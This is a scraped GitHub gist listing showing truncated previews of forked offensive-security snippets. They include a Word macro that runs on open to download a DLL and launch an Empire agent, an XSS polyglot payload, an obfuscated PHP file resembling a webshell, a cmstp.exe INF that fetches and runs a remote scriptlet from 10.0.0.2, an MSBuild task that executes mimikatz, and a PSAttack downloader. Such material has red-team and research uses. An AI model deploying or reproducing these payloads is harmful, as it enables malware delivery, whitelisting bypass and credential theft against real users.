gattacker
/ Empire_via_rundll-powershdll.vba
Created
June 10, 2019 12:30
— forked from vivami/Empire_via_rundll-powershdll.vba
VBA macro executing Empire Agent using PowerShdll via rundll
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Debugging | |
| End Sub | |
| Sub Document_Open() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| DownloadDLL |
gattacker
/ ExpandDefenderSig.ps1
Created
April 14, 2019 17:35
— forked from mattifestation/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>document.write('123')</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib,binascii | |
| hash = hashlib.new('md4', "password".encode('utf-16le')).digest() | |
| print (binascii.hexlify(hash)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //89v3s162 | |
| ${"GLOBALS"}["mmcqwmh"]="inlink" | |
| ${"GLOBALS"}["uhejyknv"]="line" | |
| ${"GLOBALS"}["mwharsbl"]="inlinks" | |
| ${"GLOBALS"}["gwnvtng"]="lines" | |
| ${"GLOBALS"}["wfxhckkh"]="paths" | |
| ${"GLOBALS"}["elsnpke"]="t" | |
| ${"GLOBALS"}["cykmety"]="is_g_ip" | |
| ${"GLOBALS"}["puhohynck"]="fontSizeChangeButton" |
gattacker
/ powersct.inf
Last active
May 10, 2018 20:21
— forked from NickTyrer/powersct.sct
Invoke Restricted Powershell via cmstp.exe /s powersct.inf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] | |
| %11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes mimikatz. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Author: Casey Smith, Twitter: @subTee --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
gattacker
/ PSA64.cs
Created
May 6, 2018 10:25
— forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371" | |
| //Based on Jared Haight work (https://github.com/jaredhaight/PSAttack) | |
| //1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
| using System; | |
| using System.Reflection; | |
| namespace PSA64 | |
| { | |
| class Program |